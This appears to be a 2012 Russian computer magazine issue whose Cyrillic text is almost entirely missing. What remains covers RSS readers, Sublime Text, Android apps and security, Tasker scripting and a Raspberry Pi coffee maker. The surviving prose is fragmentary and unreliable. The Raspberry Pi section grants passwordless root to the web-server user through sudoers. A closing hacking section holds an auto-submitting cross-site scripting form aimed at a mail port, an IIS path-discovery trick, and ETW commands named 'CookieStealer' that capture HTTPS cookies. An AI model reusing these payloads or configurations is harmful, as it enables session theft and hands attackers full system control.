Minecraft. ,

- .

, Kickstarter, Desura
.
Alpha funding ,
.
,
, . ,
,
, .

Revenge of the Titans

The invasion has landed

-
-
, . ,
- ,
.
Because We May,
.
, -
,
.
,
, .
.
-, .
,
,
DRM-Free Steam/
Desura .
,
.

.

.

PROFIT?
?
, Notch .
Minecraft .
-
, .
, , .
,
,
. ,
.
,
.
, ,
, - , . Indie Game: The
Movie .

, . Braid, Super
Meat Boy
. . z
WWW

RETENTION SOMETIMES YOU

Retention -,
. ,
- , , , .
Retention
( ),

11 /166/ 2012

,
,
.
,

.

2011-,
Steam Trauma.
Trauma Retention ,

. ,

.
Trauma , Retention
!

.
,
.

Sometimes
You: www.sometimesyou.com;

Retention
Desura: www.desura.
com/games/retention.

039

PC ZONE

(antonov.igor.khv@gmail.com)

, .
,
Google Reader
. RSS Google
Reader , ,
, .
, .
,

.

-
: ,
, iOS/Android, , Google Reader .
, .
. .

040

11 /166/ 2012

StumbleUpon
stumbleupon.com
( StumbleUpon)
, .
-
Stumble!. . ,
, . StumbleUpon
. /
, , .
, ,
.

: 7
: 8

: Free/Paid
:

:
RSS:

Prismatic
getprismatic.com
Twitter-
, .
. , ,
( ).
. , .
Prismatic - , ,
.
IT , , .

: 6
: 7

: Free
:

:
RSS:

Pulse
pulse.me

Pulse.
. ,
Pulse . ,
.
.
,
. , ,
.
. .

: 4
: 8

11 /166/ 2012

: Free
:

:
RSS:

041

PC ZONE

Surfingbird
surfingbird.ru
Surfingbird StumbleUpon. , .
, , .
, , ,
. .
. Surfingbird ,
, . , , .
. (
), - - .

: 6
: 8

: Free
:

:
RSS:

Google Currents
https://google.com/producer/currents
.
- Pulse. . , .
.
,
. , ,
( Google Reader)
. , .
. IT- GC
, IT-.

: 9
: 9

: Free
:

:
RSS:

Flipboard
flipboard.com
Flipboard
. (
), . Flipboard .
, , Flipboard
Google Reader. Twitter-,
. , , .
.
,
.
Flipboard Google Media.

: 9
: 9

042

: Free
:

:
RSS:

11 /166/ 2012

Zite
zite.com
Flipboard , Zite
. (Twitter, Pocket, Google Reader, FB),
.
, .
.
. ,
,
.
: - , ,
-, . , Zite
.
, .

: 8
: 10

: Free
:

:
RSS:

RSS

StumbleUpon

Prismatic

Pulse

Surfingbird

Google Media

Flipboard

Zite

7/10
8/10

6/10
7/10

4/10
8/10

6/10
6/10

9/10
9/10

9/10
9/10

8/10
10/10

THERE'S NO SCHOOL LIKE THE OLD SCHOOL

- RSS-
, . Newsblur (newsblur.com),
,
( ?). ,
,
Newsblur.
TinyTinyRSS (tt-rss.org),
, -
.
Google
Reader
.

11 /166/ 2012

043

PC ZONE

RSS-
FeedDemon
feeddemon.com
Windows RSS-,
FeedDemon.
(Standart Pro). . Google Reader . ( Windows XP).

. (
IE) , offline.
. readability,
. , ,
. , .
: , - . MS Outlook.

: Shareware/Free

: Windows

NetNewsWire
netnewswireapp.com
NetNewsWire MS Outlook.
NetNewsWire
: Google Reader, , Instapaper . NetNewsWire
AppleScript. ( ), . , , ,
NetNewsWire .
: AppleScript .

: Shareware/Free

: Mac OS

: iOS

Liferea
liferea.sourceforge.net
Liferea RSS- Linux. Google Reader TinyTinyRSS,
, - -.
CSS. ,


LightRead (https://launchpad.net/
lightread).
: RSS- Linux,
, , .

: Open Source

044

: Linux/BSD

11 /166/ 2012

- , . ,
- : , , . , , / . - ,
. .

Safari

Firefox

( Safari Mac OS)

. ,
/ ( , ),
Read.
,
.
(, ) ,
.

Clearly Firefox, Google

Chrome.
. Clearly , -
. Evernote.
.
.

Opera

Google Chrome

CleanPages. ,
Opera .
( ), Chrome Firefox, . ,
.

iReader. ,
Reader Safari.
. , , (
Safari) iReader . ,
Reader, iReader.
, iReader
Twitter, Facebook Flickr.

11 /166/ 2012

045

PC ZONE

Sublime Text 2

JQUERY-

Sublime Text . !
, , , ,
. :
.
, Sublime
Text, jQuery-.

046

SUBLIME TEXT 2
Sublime Text 2 .

. plain text Ruby, Python
. 154 2011 ,
.
.

,
www.sublimetext.com. 59 Sublime Text (ST),
. , ,
UNREGISTERED .

11 /166/ 2012

 Sublime Text 2

, portable-. ,
. , , ,
.
win, .

,
Sublime Text,

, . :
, ST .
, .
! . ,
Sublime Text, .
Sublime Text .
, <Alt + F3>.
(<Ctrl + H>, )! , ,
.
<Ctrl> ,
.

, .
, (<trl + K>, <Ctrl
+ B>), .
, ,
AdvancedNewFile.
, ,
<Ctrl + Alt + N> ( , ). ,
.
Sublime,
Find, .
,
, , IDE-.
ST . <Ctrl + P/R/G> /
/.
, , . Sublime Text
<F11>.
<Shift + F11>. <Alt +
>. (layouts) <Shift + Alt + >.
, : is.gd/dl0PIH.
: is.gd/BbMCyh.

SUBLIME PACKAGE CONTROL

Sublime Text Packages.
, .
,
Preferences Browse packages "Documents
and Settings\ \Application Data\Sublime Text 2\
Packages" ("Data\Packages" portable-). Sublime Package Control (SPC).
, ,
GitHub, BitBucket JSON-, . ,
. is.gd/5soWAS,
.
, Sublime Text (<Ctrl + >) ,
Installation wbond.net (bit.ly/wgKqFq) ( ,
). Sublime.
<Ctrl +
Shift + P> ( Preferences Package Control).
, Install Package,
. , <Enter>.
().
.
, GitHub/
BitBucket/JSON, SPC.

JQUERY PACKAGE

, , . Sublime Text , jQuery
. JavaScript JSON,
jQuery . jQuery
Package (is.gd/am3SkN) .
,
Preferences Color Scheme. jQuery Package
( ). ,
jQuery Mobile, jQuery Mobile Snippets:
is.gd/o8M4yj.

DETECTSYNTAX

Sublime Text ,
. , ,
. DetectSyntax (is.gd/
elmHcX) .

Sublime Package Control,

11 /166/ 2012

047

PC ZONE
, jQuery,
Packages/User/DetectSyntax.sublime-settings :
DetectSyntax.sublime-settings
{
"name": "jQueryJavaScript",
"rules": [
{ "file_name": ".*\\.js$" }
]
}

jQueryJavaScript ,
jQuery, name Packages\
jQuery\Syntaxes\jQueryJavaScript.tmLanguage. first_line .
(rules) RegExp. Packages/DetectSyntax/DetectSyntax.sublime-settings
User.
, .

Zen Coding

JSFORMAT

.
, . JS , JsFormat (is.gd/
Rbhdci) . :
JS-, ,
<Ctrl + Alt + F>.
JsFormat/JsFormat.sublimesettings , - ,
. :
"max_preserve_newlines": 4 ;
"preserve_newlines": true ;
"jslint_happy": false jslint-stricter;
"brace_style": "collapse" [collapse|expand|endexpand|expand-strict] ( collapse);
"keep_array_indentation": false .

JSMINIFIER:
JS
, . JsMinifier (is.
gd/8xhs7q) , Google
Closure Compiler UglifyJS: , , , . <Ctrl + Alt + M>, :).
, <Ctrl + Alt + Shift + M>,
.

SUBLIMELINTER

, .
SublimeLinter
(is.gd/loZ31q),
JavaScript (. is.gd/
hFXnuV ). SublimeLinter jshint,
jslint gjslint.
SPC,
Windows nodejs.
org. ,
Preferences Package Settings SublimeLinter Settings
Default sublimelinter_executable_map
node.exe, -

048

.
.
(Background mode), - . :
Load-save mode (/),
Save-only mode ( ),
On demand mode ( ,
<Ctrl + Alt + L>).
SublimeLinter JavaScript,
Python, Perl, Ruby, CSS .

BRACKETHIGHLIGHTER
, , , jQuery (is.
gd/v1hfo2) , .
.

ZEN CODING HTML

HTML jQuery- , . Zen Coding (is.gd/
hNDhz5) ,
.
: vimeo.com/7405114.
DOCTYPE HTML- <Ctrl + Alt + Shift + H>. :
1) , , zen, <Ctrl + Space> <Tab>
HTML;
2) zen- (<Ctrl + Alt + Enter>)
. zen_as_you_type.
: is.gd/RUlqj2.
Zen Coding Tag,
HTML , is.gd/X9I05R.

Sublime Text ,

11 /166/ 2012

 Sublime Text 2

<![CDATA[if (typeof jQuery == 'undefined') { \

${0: $SELECTION } // , jQuery
,
.
}]]>
</content>
<tabTrigger>undefined</tabTrigger>
</snippet>

,
$SELECTION . $SELECTION , . $1 ..
$n ,
<Tab>. , $1 .
. :
,
Tab, ( ). ,
:

jQuery + Twilight

.
, (. is.gd/lqPwyx).

<Tab>.
Tools Snippets,
, .
, . (is.gd/55pLi7) ,
JQuery Package, Packages\jQuery.

Tools New Snippet. ,
.

<snippet>
<content>
<![CDATA[Hello, ${1:this} is a ${2:snippet}.]]>
</content>
<!-- <tabTrigger>hello</tabTrigger> -->
<!-- <scope>source.python</scope> -->
</snippet>

:
snippet , ;
content ,
: <![CDATA[ ]]>;
tabTrigger (hello) <Tab>
;
scope ,
.
, <scope>source.html</scope> HTML-;
description .
.

<snippet>
<content>

11 /166/ 2012

<string>
.hide(${1/(^[0-9]+$)|.+/(?1::')/}
${1:slow/400/fast}${1/(^[0-9]+$)|.+/(?1::')/}, function() {
${0: // , };
});
</string>

1:slow/400/fast , 0://... .
, .
$PARAM1 .. $PARAMn ,
insertSnippet
$SELECTION ,

$TM_CURRENT_LINE ,

$TM_CURRENT_WORD ,

$TM_FILENAME ,

$TM_FILEPATH ()
$TM_FULLNAME
$TM_LINE_INDEX ,
, 0
$TM_LINE_NUMBER , ,
1
$TM_SELECTED_TEXT $SELECTION
$TM_SOFT_TABS YES, translateTabsToSpaces ,
NO.
$TM_TAB_SIZE (
tabSize)

Packages User _.
sublime-snippet, .
.
,
SaneSnippets, .

, Sublime Text , jQuery.

,
.
, , .
! z

049

 (androidstreet.ru)
(appstudio.org)

X-MOBILE

,
,

,
.

,
,
,
.
050

Android
Titanium Backup
Android 1.0
matrixrewriter.com/android/

, , ,
. Titanium Backup
Android- .
,
, ,
,
.
188 , , , Dropbox Google Drive,
SMS MMS, , , ,
,
, ClockworkMod, .
-, .

11 /166/ 2012

Ghost
Commander
Android 1.6
goo.gl/DbtXw

AirDroid
Android 2.1
airdroid.com

Ghost Commander
Android.

:

, Norton
Commander Far.
,
. , root, ,
,
, ZIP-, FTP- SMB-.

.

AirDroid



.
,
/
, /
SMS, , ,

, .
Wi-Fi, ,
AirDroid.

Pocket

Barcode Scanner

Android 2.2
getpocket.com

Android ( )
goo.gl/eWoL

-
, ,
Pocket. ,
,
, ,
.

Android iOS,
, ,
, Pocket
.

- ,


, QR-.
,
.
QR- Google Play.
, Barcode
Scanner. , , ,
, .

Prey Anti-Theft

Shazam

Android 1.6
preyproject.com

Android (
)
shazam.com

.
Prey,
.
,
-
preyproject.com, , ,
GPS,
SIM-, .
,
.

,
.

11 /166/ 2012

,

, . XXI

. Shazam
,
,
, , , .

, -.
, ,
,
.

051

X-MOBILE
CluBalance

SystemPanelLite

Android 1.6

Android 1.5

.
,
CluBalance,

.
,
.
, , ,
( , SMS, )
.

Android- ,
,

-. , SystemPanel,

, , , ,
, .
.

iOS
Bump
iOS 4.1
https://bu.mp

GoodReader
for iPhone
iOS 4.0
goodreader.com
4,99 $

iPhone
Apple,

, -
iOS.
:
, iMessage ,
( iOS/
Mac), Bluetooth Wi-Fi
iOS . App Store
,
. , Bump. ,
iOS, Android,
: .

GoodReader

PDF-, ,

iOS.
GoodReader
Microsoft Office, iWork, txt, RTF, .
,
WebDAV, FTP, SFTP AFP, iCloud, Dropbox, SkyDrive SugarSync. ,
iPhone .
PDF, GoodReader ,
300 .

iCab Mobile

PhotoForge2

iOS 3.1
www.icab-mobile.de
1,99 $

iOS 4.2
photoforge2.com
2,99 $

Safari, iOS,
iCab Mobile . ,
, , ,
, ,
Dropbox Firefox Sync, Safari. iCab Mobile
, .
.

, App Store .
, .
PhotoForge2 .
, ,
, , 25
, , , , , .
,
, .

052

11 /166/ 2012

Launch Center
Pro
iOS 5.1
appcubby.com/launch-center
2,99 $

TuneIn Radio
iOS 4.0
tunein.com/mobile/ios

iPhone
,
,
.
Launch Center Pro
iPhone. : , (, , ).
Launch Center Pro ,
. ,

, .

iPhone FM, Apple

iOS.
,

, -. , ,
TuneIn Radio, iOS .
70 000 (
),
,
. AirPlay.

Air Video

AVPlayer

iOS 4.3
www.inmethod.com/air-video
2,99 $

iOS 4.0
eplayworks.com
2,99 $

AVPlayer,
,

iOS-. Air
Video,
iPhone, iPod touch iPad. :
, (,
PC), Air Video,
,
. Air Video
iOS-,
.
, iPhone,
.

Apple


, -
iOS
App Store.

AVPlayer,
( AVI WMV XVID MKV)
. MKV, AVI, MP4, MOV M4V
1080p. ,
AVPlayer .
, , .

iTranslate Voice

AppShopper

iOS 4.3
www.itranslatevoice.com
0,99 $

iOS 4.3
appshopper.com

Siri ,
. ,
Siri ,

. ,
Siri ,
?
iTranslate Voice,
. ,
. iPhone .
, ,
, SMS Twitter.

App Store :
, App Store,

.
,
. App Store ,
,
Apple.
AppShopper,
iOS-.
, wish- ,
, .
, .

11 /166/ 2012

053

X-MOBILE

(androidstreet.ru)

ANDROID
Android , , , .

Android -, .
?

Android

: Google
,

Android. ,
, ,
.
,
Linux,
root,
, .

, ,
.
?
?
Android
iOS ,

054

, ?
.

?
Android
Linux,
. Linux
, ,

. ,
Android
,
.

: .
Android
.
(UID)
/data,
,

,
.
Android
(sandboxing),
, ,
.
,
.
Android root, zygote,
, . ,
,
,
, SD-,

( ).
,
Android, NAND-
/system. , ,

( /data), -


(, ,
root, ).
IPC,

11 /166/ 2012

Linux , ,
, , ,

, Android NDK.
Binder

(
).
, Android,
2.2, ,
, UNIX Windows.
API, ,


. ,

Android,
.
API
,

.
Android

,
.

.
3.0, Android
dmcrypt Linux.
/data AES128 CBC

ESSIV:SHA256 , ,
.
, ,

.

, Android

Android (),
,
.

, ,
(
)
( SMS
).
Android :
,
Android .
AndroidManifest.xml APK-

,
,
.
.
Android
,
, ,
.
-

SMS/MMS

IM

Email-

IPC

XMPP

Android

Surface
Manager

Media
Framework

SQLite

OpenGLES

FreeType

LibWebCore

Dalvik

SSL

Libc

Bluetooth

Binder

USB-

WiFi

SGL

Linux

Android

11 /166/ 2012

, ,
- (,
SMS ),

.

.
,
, . ,

SMS,
.
,
Google

( ),
.
,
,
. ,
, Google
Android ,
SD-.
,

, , , GPS,

GPS.

. ,
SIM-
, , .

, Linux,
root
, - , .

,
, Android
Binder, (Intents)
(Content Provider).
(RPC),
Linux, Service Manager.

Binder
,
. ,

, .
, Android Binder ,

055

X-MOBILE

, UID ,

, ,
.

. ,


.

Android-. , API ,
AndroidManifest.xml .
(Content
Provider), (
Binder),

. Android
, , -, .
.
Binder , .
- . ,
, -,
,
URI. ,
( , URI), URI ( ,

, ). ,

,
. , URI,
.
,
, Android
,
,
,
.

. ,
Dropbox Android
, ,
Dropbox
(www.securelist.com/en/
advisories/45572).

056

, Android NDK,
, , Android

,
. Android 1.5
safe-iop (code.google.com/p/
safe-iop),

( integer overflow).
OpenBSD
dmalloc,
,
calloc
. Android, 1.5,

GCC ProPolice
.
2.3

, '-Wformat-security',
'-Werror=format-security',

( No eXecute (NX),
ARMv6). Android 2.3
,
2009 Linux 2.6 (
NULL-),
/proc/
sys/vm/mmap_min_addr.
Linux,
.
4.0, Google
Android Address space layout
randomization (ASLR),
,
, .

, . , 4.1, Android
RELRO (Read-only
relocations),
,

ELF-. 4.1
dmesg_restrict
(/proc/sys/kernel/dmesg_restrict),
2.6.37 (dmesg)
.

Google Play ( Android Market)
Android. ,
,
,

,
,
.

, -
.
, ,

11 /166/ 2012

Binder

IPC

Binder

, Google Play,
.
, ,
Android.
,
, Apple App Store,
Google
Bouncer,
,
.
Bouncer , , ,

,
,
SMS .
Google, Bouncer
40%. ,
,
: (e-mail-
, )
, ,

.
, Google
Bouncer
,
Google Play,
,

.

. -
OpenBSD ,
,
Google .
Google
Android (Android Security
Team), ,
,
, , -.
:

. Android
.
, Google Information
Security Engineering team
.
.

.
,
-.

,
:
1. ,
OHA (Open Handset Alliance), .
2. ,
.
3. , , OHA.
4. Android Open
Source Project.
5. / OTA

.

, OHA,
.
,
,
AOSP.
(, ),

AOSP,

.

,
,
.

,
Android
,
. ,
Android ,
.
.
,
,
OpenBSD ,
. z

, ,
,
Android, -

11 /166/ 2012

ps ,

057

X-MOBILE

(gotsijroman@gmail.com)

www.flickr.com/photos/laihiu

ANDROID
, . , ,
.
- ,
. Android

Tasker
SL4A, ,
, .
TASKER
Tasker , Android.

,
. , , Tasker
. .
? , . , ,
? ? , Tasker
. , SMS, ,
. Tasker
.

058

3,49 ( ), , , trial-
tasker.dinglisch.net. :
,
, . ,
, Google Play -
.

, . (
Preferences Language) ( ,
. . .).
. : Profiles,
Tasks Scenes ( 1).
Profiles , , .
,
, , ,
, GPS
.
, .
, .
,
,
( ),
.
, - .

11 /166/ 2012

1: Tasker

2:

,
.
.
. ,

. ,
, . : ,
.

, : ,
.
+ .
.
, ,
( ).
( 2).
:
. ,
, , . , ,
.
. ,
. ,
,
.
. ,
. .
. ,
, (. ).
.

11 /166/ 2012

3:

. . ,
, ,
Wi-Fi- ,
(-, :)).

( 3). Sensor, .
.
.
. ,
. ( , ) .

, .
,
( 4). ,
. ,
, ,
.
( , : goo.gl/cdHXh).
.
,
, ,
.
,
.
, ;
. ,
: , . Call,
.

059

X-MOBILE
, Any, . ,
, Tasker ,
Call , , ,
. ! . ,
, , . , ?

. , ,
.
. .
.
( )
. Sensor,
Shake. , .
! ; . .
. (
) .

. , , .

SCRIPTING LEVEL FOR ANDROID

Tasker, . Tasker ,
, UI
(
Scenes). , , , SL4A.
SL4A (Scripting Level for Android) ( ) Android Python, JavaScript, Perl,
Ruby, Lua, BeanShell Tcl. API
Android JSON RPC
Android,
, SMS, GPS,
, GUI.
- Python,
.
SL4A
(goo.gl/uG6X4) Python (goo.gl/8IPwY). Python Install,
Android.

, , ,

. , GPS ,
, 30 999 .
, ,
GPS, . ,
, , .

060

4:

. , , SL4A/Scripts .
SL4A,
Add, Python. . ,
:
import android
droid = android.Android()

API
, API .
API ,
( API SL4A : goo.
gl/lVfd9). makeToast,
. :
#
droid.makeToast("Hello world!")
print("Hi from Python")

, .
, 5. , .

- .
SMS-
,
. play music,
.
import android
droid = android.Android()

11 /166/ 2012

INFO

#
msgs = droid.smsGetMessages(False).result
#
lastmessage = msgs[0]
#
if "play music" in lastmessage['body']:
#
droid.mediaPlay('/sdcard/music/track.mp3')
#
# ,
#
droid.smsSend(last.address, "Command complete")

, , Tasker
. . .
. , (
)
ID3- MP3-. , .
Stagger (goo.gl/WBiQ5).
, SL4A pure Python
, com.googlecode.python.
python3forandroid/extras/python3 .
, ,
MP3- :

Tasker
,
.
, Locale
plugin.
SL4A
Android.
Kivy
(kivy.org/docs/guide/
android.html).

5: SL4A-

, Tasker,
APK
Tasker App Factory:
goo.gl/Fi0Em.
SL4A: goo.gl/R7MTv.

# MP3-
for(dirName, dirs, files) in os.walk(r'/sdcard'):
for filename in files:
try:
if filename.endswith('.mp3'):
pathname = os.path.join(dirName, filename)
#

SL4A
,
:
.encode('cp1251').
decode('utf8').

WWW

, ,
.
Tasker.

SL4A:
goo.gl/X2CvB;
Tasker:
goo.gl/wJZkb;
Tasker
4pda.ru: goo.gl/
Q1hWX.

SL4A
: webViews (HTML5 + JavaScript), fullScreenAPI ( : goo.gl/OCQdw) dialogAPI,
. FTP-.
, , dialogAPI.
# glob
# filesNames
...
# ,
droid.dialogCreateAlert(" ", " \
")
#
droid.dialogSetMultiChoiceItems(filesNames)
#
droid.dialogSetPositiveButtonText("OK")
droid.dialogSetNegativeButtonText("")
# ,
droid.dialogShow()
# , (positive, negative
# neutral)
if droid.dialogGetResponse().result['which'] == \
"positive":

11 /166/ 2012

,


.

: goo.
gl/1jPxP.

DVD

6: HelloWorld.py

, Python Stagger

Tasker.

#
res = droid.dialogGetSelectedItems().result
# ftplib,
...

?
Tasker SL4A Android . SL4A
Android. , , , . z

061

PHREAKING

Alexander Lykoshin (alykoshin@gmail.com, ligne.ru)

RASPBERRY PI
1998
HTCPCP/1.0
. , ,
Raspberry Pi.

,
. 1998-
,
. , RPi, . 2560
8-
8090- , - Wi-Fi,
.
.
, RPi, RPi Wi-Fi.
, .
, , -. , ,
.
SSH,
,
.

. :
, , , , .
. ,
, .
,
: .
.
,
,
Moulinex BCA 1.L1 Little Solea.
640 , 0,6 .

RPi
(. 2), - USB-

062

USB- .
, -
, , USB-
.
, ,
. overscan,
.

Raspbian, Debian, .
bit.ly/PhB13h ( Raspbian
wheezy), , Linux,
.
, , , Windows,
Win32DiskImager ( ), SD-,
2 . SD-
(bit.ly/R2Mm96),
, .
RPi , , ,
, SD.
SD- RPi,
( pi, raspberry) , 2 SD-
SSH. , ,
, .
,
RPi. ,
.
:
$ sudo raspi-config

11 /166/ 2012

. 1. raspi-config

:
$ sudo reboot

RPi
, .
$ sudo apt-get update
$ sudo apt-get upgrade

ETHERNET WI-FI
Wi-Fi- D-Link DWA-140 B2
bit.ly/SVSJtY. , , :
$ lsusb
<..>
Bus 001 Device 006: ID 07d1:3c0a D-Link System DWA-140
RangeBooster N Adapter(rev.B2) [Ralink RT3072]
$ iwconfig
lo
no wireless extensions.
eth0
no wireless extensions.
wlan0
IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated
Tx-Power=20 dBm
Retry long limit:7
RTS thr:off
Fragment
thr:off
Power Management:on

Wi-Fi (bit.ly/Sneinf).

SSH VNC
SSH . Windows- Putty,
Irssi ConnectBot.

SSH RPi
(, , Motion,
), vncviewer
TightVNC, androidVNC.
VNC, bit.ly/P2xift
bit.ly/UzXRpl.

. 2. GPIO. ,

, RPI (bit.ly/OvWQBH),
USB-
. , Motion (bit.
ly/SMXbkb) Working Devices Non Working Devices.
Working Devices, ,
,
.
$ lsusb
<..>
Bus 001 Device 007: ID 046d:0826 Logitech, Inc.

,
:
$ sudo apt-get install uvccapture
$ uvccapture -S80 -B80 -C80 -G80 -x800 -y600

snap.jpg (
), RPi
Image Viewer.
Motion , , ( ), .
: bit.ly/SMXbkb.
$ sudo apt-get install motion

Motion , :
$
$
$
$
$

sudo
sudo
sudo
sudo
sudo

mv /etc/rc2.d/S03motion /etc/rc2.d/K03motion
mv /etc/rc3.d/S03motion /etc/rc3.d/K03motion
mv /etc/rc4.d/S03motion /etc/rc4.d/K03motion
mv /etc/rc5.d/S03motion /etc/rc5.d/K03motion
nano /etc/default/motion

# set to yes to enable the motion daemon

start_motion_daemon=yes

- Motion :
$ sudo nano /etc/motion/motion.conf

- MOTION
- Logitech HD
Webcam C525. - -

11 /166/ 2012

webcam_localhost off
control_localhost off

063

PHREAKING
,
.
$ sudo nano /etc/motion/motion.conf
# Command to be executed when a motion frame is detected
# (default: none)
on_event_start sudo /home/pi/motion-det

/home/pi/motion-det ,
. root .
Motion (motion) sudoers:
$ sudo visudo

:
motion ALL=(ALL) NOPASSWD: ALL

:
$ sudo motion -n

Motion ,
: //<raspberrypi>:8080. <raspberrypi> IP- RPi.
//<raspberrypi>:8081. Firefox
. Chrome K.
RPi .

$ sudo motion -s

, .
/tmp/motion,
JPG,
SWF. . :
output_normal off
ffmpeg_cap_new off

Model B Revision 1.0
Model B Revision 1.0 + ECN0001
(no fuses, D14 removed)
Model B Revision 2.0

2
3

WWW
Hyper Text Coffee
Pot Control Protocol (HTCPCP/1.0):
bit.ly/RqSOcg.

4, 5, 6

Raspberry Pi

GPIO
RPi -.
GPIO, General Purpose Input/Output, -
. ,
,
?
RPi
.
GPIO- 3,3 . RPi
, 5
.
, , 16 . ,
2 16 , 8 .
3,3 ,
(,
) 2 .
16 , 3,3 .
: bit.ly/Qp4PMk, ,
, : bit.ly/StAFqI.
: bit.ly/StAJXA.
, Revision 1 2,
. ,
, cat /proc/cpuinfo
hardware revision code . Revision 1 2 : bit.ly/QNHKDF.
+5 3,3 , (GND) GPIO 4,
,
. RPi RPi
. ,
. ( ,
)
: bit.ly/QAeNOg.

.
.
.
$ sudo -i

:
$ echo "4" > /sys/class/gpio/export

:
$ echo "out" > /sys/class/gpio/gpio4/direction

:
$ echo "1" > /sys/class/gpio/gpio4/value
. 3.

064

$ echo "0" > /sys/class/gpio/gpio4/value

11 /166/ 2012

echo -ne Switching GPIO $PORT_NUM from $OLD_VALUE_TEXT \

to $2...
echo $NEW_VALUE > /sys/class/gpio/gpio$PORT_NUM/value
echo done.

:
$ chmod +x switch_gpio

:
$ switch_gpio 4 on
$ switch_gpio 4 off

. 4.

:
$ echo "in" > /sys/class/gpio/gpio4/direction

:
$ cat /sys/class/gpio/gpio4/value

:
$ echo "4" > /sys/class/gpio/unexport

,
:
$ sudo nano switch_gpio

:
#! /bin/bash
PORT_NUM=$1
if [ $2. == on. ]; then
NEW_VALUE=1
else
if [ $2. == off. ]; then
NEW_VALUE=0
else
echo Usage: $0 PORT_NUM on|off
exit
fi
fi
# GPIO
if [ ! -e /sys/class/gpio/gpio$PORT_NUM ]
then echo $PORT_NUM > /sys/class/gpio/export
fi
#
OLD_VALUE=$(cat /sys/class/gpio/gpio$PORT_NUM/value)
if [ $OLD_VALUE == 1 ]; then
OLD_VALUE_TEXT=on
else
OLD_VALUE_TEXT=off
fi
echo "out" > /sys/class/gpio/gpio$PORT_NUM/direction

11 /166/ 2012

: bit.ly/
TSJMbL. , GPIO
, . GPIO , 3,3 ,
.
.
( )
, , . R1 (1 ), 522 (1N4148),
H547. , . .
640 . ,
220 640 / (220/1,41) = 4,1 .

.
, , TRIL-5VDCSD-2CM-R, 5 8
250 .
. ,
,
. +5 ,
RPi, +5 ,

RPi. 220 ,

.
RPi
, ,
, ,
26-, 4- . ,
, , 220 . 0,75, , . .
, 0,75,
, .
: 220 50 ,
, RPi.
,
220 . ,
,
.
.
RPi, 220. . , RPi, 220.
, RPi . , 220 .
220, , 220,
. !

065

PHREAKING
,
, ,
.

WEBIOPI
GPIO
WebIOPi. ,
(/),
.
: bit.ly/UYErPr.
$ sudo apt-get install apache2 php5

WebIOPi rewrite (.htaccess):

$ sudo a2enmod rewrite
$ sudo nano /etc/apache2/sites-enabled/000-default

<Directory /var/www/>
AllowOverride None AllowOverride All:
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

Apache (www-data) sudoers:

$ sudo visudo

. 5. ,

, Motion:
$ nano /home/pi/motion_det

:
#!/bin/bash
/home/pi/switch_gpio 4 on
service motion stop
sleep 1800
/home/pi/switch_gpio 4 off

www-data ALL=(ALL) NOPASSWD: ALL

:
Apache:
chmod +x /home/pi/motion_det
$ sudo /etc/init.d/apache2 restart

WebIOPi:
$ wget //webiopi.googlecode.com/files/WebIOPi-0.3.tar.gz
$ tar xvzf WebIOPi-0.3.tar.gz

Motion, . ,
motion_det,
GPIO 4, , Motion, 30
, .

$ sudo mv webiopi /var/www

: //localhost/webiopi.
RPi,
Chromium Midori, NetSurf, Dillo - JavaScript.

- WebIOPi,
.
Motion , 8:00, /etc/crontab:
0

8
* * *
echo $(date): $(service motion start) >> \
/var/log/motion_start.log

Cron :
crontab /etc/crontab

066

(
, , , ).
, ,
, , . ,
RPi, , , 25 .
,
( ) .
,
. ZygBee,
,
. SMS,
3G-, DTMF, Asterisk
Freeswitch.
iPhone/iPad.
, RPi . z

11 /166/ 2012

166
!
: ?
-, .
300 . -,
. ,
. -, 20
KIS!

6 1110 .
12 1999 .

Kaspersky Internet
Security

, .
.
20 ,
26 10 ,
KIS .
.
http://shop.glc.ru.

http://shop.glc.ru

8 (800) 200-3-999 ()
subscribe@glc.ru

 / EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
XSS

, -.
,
-
XSS
WordPress . /

.
, ,
. ,
- .
OK? . .
.
(Michal Zalewski) The Tangled
Web: A Guide to Securing Modern Web
. , .
, ZeroNights 2011 . :).
,
. ,
- , .
XSS-.
. ESMTP. ,
(. ][). Command
unrecognized: " ". ,
,
. ,
, ESMTP? ,

068

WARNING

.
,

,

.

,
. ESMTP
. , .
- ,
-, . , .

HTTP-, , (
-).
<script>alert('xss');</script>.
XSS. :).

XSS

11 /166/ 2012

. . -, ,
XSS ,
, .
, . ,
. -, -
, ,
-
. ,
. Chrome , Firefox ( HTML-), IE
HTML ( ). , IE.
. ,
, ,
,
HTML.
,
( ).
,
,
(, , SMTP- 25 ).
, ,
-

.
.
. .
JS ? .
, ,
URL-. < >
%3c %3e. . ,
plain/text multipart/formdata.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; \
charset=utf-8">
<title>Port reflection XSS trick</title>
</head>
<body>
<form action="http://victom.com:25/"
enctype="multipart/form-data" method="post">
<p>
<input name="xss" value="<script>alert(1);</script>">
</input>
</p>
</form>

<script>document.forms[0].submit();</script>
</body>
</html>

- IIS

,
- / . , / - spider, , ,
,
/.
DirBuster. K. IIS .NET
, .
- ,
-
.
- .
. 500, -
, ,
404 ,
403 ,
. .
, (Soroush Dalili)
(, - ),
.

URL ?aspxerrorpath=/.
,
,
.
, (, - , - aspxerrorpath,

11 /166/ 2012

), .
, goo.gl/axK3b. , , ,
.
, , ,
:). .
,
DirBuster, :
Standart Start Point URL Fuzz
?aspxerrorpath=/.

, 500. . :

URL aspxerrorpath,

069

 / EASY HACK

OLLYDBG

, . .
, , .
.
. OllyDbg ( ImmunityDbg) ,
-, , -, Python-
( ).
bit.ly/IvP4Bv.
, . , (Mario
Vilas), , WinAPI-,
OllyDbg,
win32.hlp. Microsoft
( OllyDbg) .
.
, Microsoft

MSDN.
. .
, Win32.hlp OllyDbg/ImmunityDbg. (<ctrl + F1>
help on symbolic name) -
. MSDN
.

.
:

1.
2.
3.
4.

OllyDbg.
OllyDbg Help Select Api help file.
win32.hlp ( ).
!

, ,
- .

-, , .

. , .
- .
, ,
. ,

. ,

PaulDotCom.com
, , , ,
, HTTPS.

Windows. :).
? , Event Tracing
for Windows (ETW). , :). , ,
- , ,
- .
ETW WinInet API. ,
HTTPS.
, ETW, ,
.

070

Windows ...

:
1. :
logman start CookieStealer -p \

11 /166/ 2012

Microsoft-Windows-WinInet -o cookiesteal.etl ets

start ;
CookieStealer data collector;
-p Microsoft-Windows-WinInet ;
-o ;
ets Event Trace
Sessions.
2. :
wevtutil qe c:\temp\cookiesteal.etl /lf:true | find /i \
